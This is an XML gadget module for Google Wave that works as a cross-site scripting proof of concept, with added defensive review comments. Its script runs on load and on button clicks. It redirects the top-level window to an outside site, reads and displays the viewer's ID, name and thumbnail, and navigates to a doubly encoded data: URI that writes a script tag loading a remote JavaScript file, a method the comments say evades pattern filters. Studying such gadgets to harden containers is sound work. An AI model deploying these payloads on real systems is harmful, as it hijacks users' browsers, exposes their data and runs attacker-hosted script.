<?xml version="1.0" encoding="UTF-8" ?> 
<Module>
<!--
  Gadget preferences for a cross-site scripting demonstration (see the title).
  The two Require elements ask the container for the "wave" and "wave-preview"
  features; the script in the Content section calls wave.getViewer(), so it
  depends on the container injecting that API.
  NOTE(review): a container that grants these features to any gadget a
  participant adds is handing viewer data to third-party script; confirm which
  features untrusted gadgets are allowed to request.
-->
<ModulePrefs title="XSS example" height="120">
  <Require feature="wave" />
  <Require feature="wave-preview" /> 
</ModulePrefs>
<Content type="html">
<![CDATA[ 
    <script type="text/javascript">
	
	/**
	 * Click handler for the "onAction pwn" button.
	 *
	 * Baseline case of the demonstration: it only raises a modal dialog, which
	 * proves that script shipped inside the gadget runs when the viewer
	 * interacts with it. Nothing is read or navigated here.
	 */
	function actionPwn() {
		var notice = "onAction attack";
		alert(notice);
	}
	
	/**
	 * Click handler for the "onAction pwn - 2" button.
	 *
	 * Announces itself with a dialog, then assigns a new URL to
	 * window.top.location, i.e. it tries to navigate the outermost browsing
	 * context rather than the gadget's own frame. Whether that succeeds
	 * depends on how the container frames the gadget.
	 *
	 * Defensive note: a host that renders third-party gadgets can stop this
	 * class of redirect by framing them with a sandbox attribute that omits
	 * allow-top-navigation.
	 */
	function actionPwn2() {
		var destination = "http://www.e-x-e.dk";
		alert("onAction attack 2: Location manipulation");
		// Targets the top-level window, not the gadget frame.
		window.top.location = destination;
	}
	
	/**
	 * Click handler for the "onAction pwn - 3" button.
	 *
	 * Shows what the wave API exposes to gadget script about the person
	 * viewing the wave: the viewer's id, display name and thumbnail URL, each
	 * echoed in its own dialog. Nothing is sent off the page here.
	 *
	 * Defensive note: these values are readable by any gadget that is granted
	 * the wave feature, so a container should treat them as disclosed to every
	 * gadget author whose gadget a viewer can be shown.
	 */
	function actionPwn3() {
		// Label / accessor pairs, listed in the order they are displayed.
		var fields = [
			["Viewer ID: ", function (viewer) { return viewer.getId(); }],
			["Viewer displayname: ", function (viewer) { return viewer.getDisplayName(); }],
			["Viewer thumbnail url: ", function (viewer) { return viewer.getThumbnailUrl(); }]
		];
		var i;

		alert("onAction attack 3: Viewer informations");
		for (i = 0; i < fields.length; i++) {
			// The viewer object is fetched once per field.
			alert(fields[i][0] + fields[i][1](wave.getViewer()));
		}
	}
	
	/**
	 * Click handler for the "onAction pwn - 4" button.
	 *
	 * Like actionPwn2 it assigns to window.top.location, but the target is a
	 * data: URI carrying a base64-encoded HTML document instead of an http
	 * URL. Decoded, that document is a single script element which uses
	 * document.write with String.fromCharCode to emit a second script tag that
	 * loads a file from a remote host. The destination is therefore hidden
	 * behind two layers of encoding, which defeats naive string matching on
	 * URLs or on the word "script".
	 *
	 * The literal is kept exactly as published, including the embedded spaces.
	 *
	 * Defensive notes: decode nested payloads before judging a gadget, and do
	 * not rely on pattern filters alone; framing gadgets in a sandbox without
	 * allow-top-navigation removes the primitive itself. Current mainstream
	 * browsers also refuse top-level navigation to data: URLs.
	 */
	function actionPwn4() {
		var encodedPage = "data:text/html;base64,PHNjcmlwdD5kb2N1bWVudC53cml0ZShTdHJpbmcuZnJvbUNoYXJDb2RlKDYwLDExNSw5OSwxMTQs MTA1LDExMiwxMTYsMzIsMTE1LDExNCw5OSw2MSwzNCwxMDQsMTE2LDExNiwxMTIsNTgsNDcsNDcs MTA1LDExMCwxMTYsMTAxLDExNCwxMTAsNDgsMTE2LDQ2LDExMCwxMDEsMTE2LDQ3LDExMiwxMTEs OTksNDYsMTA2LDExNSwzNCw2Miw2MCw0NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDYyKSk8L3NjcmlwdD4=";
		alert("onAction attack 4: Location manipulation, local content");
		// Targets the top-level window, not the gadget frame.
		window.top.location = encodedPage;
	}
	
    /**
     * Load-time entry point of the gadget.
     *
     * Unlike the actionPwn* handlers, which wait for a button click, this
     * runs without any interaction: it is registered below as an on-load
     * handler and raises a dialog as soon as the container fires it. It
     * shows that merely displaying the gadget is enough for its script to
     * execute in the viewer's browser.
     */
    function init() {
      var banner = "Start of the XSS attack, loaded gadget load";
      alert(banner);
    }
    // Ask the gadget container to call init() once the gadget has loaded.
    gadgets.util.registerOnLoadHandler(init);
    </script>
  	<!-- Demo controls: each button calls the script function named in its
  	     onclick attribute (actionPwn, actionPwn2, actionPwn3, actionPwn4).
  	     These four run only when the viewer clicks; init() above runs on load.
  	     NOTE(review): inline onclick handlers only work where the container
  	     permits inline script; a content security policy that forbids inline
  	     script would disable them. -->
  	<strong>onAction attacks</strong><br />
	<input type="button" onclick="actionPwn()" value="onAction pwn" />
	<input type="button" onclick="actionPwn2()" value="onAction pwn - 2" />
	<input type="button" onclick="actionPwn3()" value="onAction pwn - 3" />
	<input type="button" onclick="actionPwn4()" value="onAction pwn - 4" />
  ]]> 
  </Content>
</Module>